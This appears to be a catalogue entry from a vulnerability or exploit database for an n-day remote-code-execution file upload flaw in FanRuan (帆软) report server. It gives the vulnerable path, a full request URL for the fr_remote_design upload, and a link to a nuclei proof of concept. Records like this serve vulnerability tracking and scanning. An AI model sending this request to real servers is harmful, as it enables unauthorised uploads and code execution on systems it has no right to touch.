vendor = "帆软"
name = "帆软报表fr_remote_design文件上传"
type = "RCE"
version = "未知"
path = "/WebReport/ReportServer"
detail = "/WebReport/ReportServer?op=fr_remote_design&cmd=design_install_reufile&reuFileName=vulntest.reu&isComplete=false"
fix = "似乎是抄的致远，应该是老洞 https://github.com/adysec/nuclei_poc/blob/5fb2ccc74d0c6d17186ad42e2a6a1375f839895d/poc/other/frserver-listdir.yaml#L11"
date = "0703"
label = "nday"
verifier = "sxf"
